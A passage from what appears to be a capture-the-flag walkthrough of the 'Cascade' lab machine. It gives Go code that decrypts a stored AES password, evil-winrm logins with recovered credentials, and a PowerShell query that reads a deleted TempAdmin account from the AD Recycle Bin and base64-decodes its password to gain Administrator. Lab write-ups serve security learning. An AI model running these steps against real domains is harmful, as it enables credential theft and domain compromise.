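	if !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("pkcs7: inconsistent padding bytes")
	}
	return b[:len(b)-n], nil
}

func pkcs7Pad(b []byte, blockSize int) []byte {
	n := blockSize - len(b)%blockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// DecryptString mirrors CascCrypto.Crypto.DecryptString:
// Base64 -> AES-128-CBC(key, fixed IV) -> strip PKCS#7 -> UTF-8.
func DecryptString(encoded, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext is %d bytes, not a multiple of %d", len(ct), aes.BlockSize)
	}
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(cascIV)).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt, aes.BlockSize)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// EncryptString is the inverse. With a fixed IV, equal plaintexts give equal
// ciphertexts, so a recovered key/IV can be confirmed by re-encrypting a known
// plaintext and comparing against the stored value.
func EncryptString(plain, key string) (string, error) {
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	pt := pkcs7Pad([]byte(plain), aes.BlockSize)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, []byte(cascIV)).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

func main() {
	// Ciphertext from the ldap table of Audit.db, as shown above.
	pw, err := DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", cascKey)
	if err != nil {
		panic(err)
	}
	fmt.Println("ArkSvc password:", pw)
}
```

The fixed IV is worth calling out on its own: every row in Audit.db is encrypted under the same key and IV, so two accounts with the same password produce identical ciphertext, and one decrypted row confirms the key for the whole table.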


You can then evil-winrm into the host with ArkSvc / w3lc0meFr31nd credentials:

# evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc


AD Recycle Bin


Running whoami /all shows that we're a member of CASCADE\AD Recycle Bin. That is a custom domain local group, not a built-in, so someone has delegated read access on the Deleted Objects container to it; by default only SYSTEM and the domain's administrators can look in there:

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group 
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group 
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group 
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group 
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Earlier on, the ArkAdRecycleBin.log file from the Data share showed this very account moving objects into the recycle bin, one of them called TempAdmin:

8/12/2018 12:22 [MAIN_THREAD]   Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD]   Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local

The TempAdmin entry is the interesting one. Because the Active Directory Recycle Bin feature is enabled (the tool's log proves it), deleted objects keep their attributes instead of being stripped down to a bare tombstone, so nothing needs to be restored: reading them is enough. The AD PowerShell module is available on the DC, so from the WinRM session:

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property * 

This returns a lot of information, however the last entry has some juicy details:

accountExpires                  : 9223372036854775807                                
badPasswordTime                 : 0                        
badPwdCount                     : 0                  
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin                 
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059               
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz                              
CN                              : TempAdmin                                             
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059          
codePage                        : 0                                             
countryCode                     : 0                                                 
Created                         : 1/27/2020 3:23:08 AM                                         
createTimeStamp                 : 1/27/2020 3:23:08 AM     
Deleted                         : True                
Description                     :                                
DisplayName                     : TempAdmin                                
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}      
givenName                       : TempAdmin                       
instanceType                    : 4                                                 
isDeleted                       : True                                              
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local                
lastLogoff                      : 0                                                 
lastLogon                       : 0                                                 
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM                              
modifyTimeStamp                 : 1/27/2020 3:24:34 AM                              
msDS-LastKnownRDN               : TempAdmin                                   
Name                            : TempAdmin                                    
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059       
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity  
ObjectCategory                  :                                                   
ObjectClass                     : user                                              
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059              
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136    
primaryGroupID                  : 513                                            
ProtectedFromAccidentalDeletion : False                                             
pwdLastSet                      : 132245689883479503                                
sAMAccountName                  : TempAdmin                                                              
sDRightsEffective               : 0                                                              
userAccountControl              : 66048                                             
userPrincipalName               : TempAdmin@cascade.local                           
uSNChanged                      : 237705                                            
uSNCreated                      : 237695                                            
whenChanged                     : 1/27/2020 3:24:34 AM                              
whenCreated                     : 1/27/2020 3:23:08 AM    

Right at the top is cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz, the same custom attribute as before. Base64-decoding it gives:

# echo YmFDVDNyMWFOMDBkbGVz | base64 -d; echo
baCT3r1aN00dles

This is the temporary admin account's password, and given the log entry (an admin account created, used and then deleted) it is worth trying against the built-in Administrator as well.


Flag


It works, so you can log in via WinRM and read the root flag:

# evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> type desktop\root.txt
6bc0ba...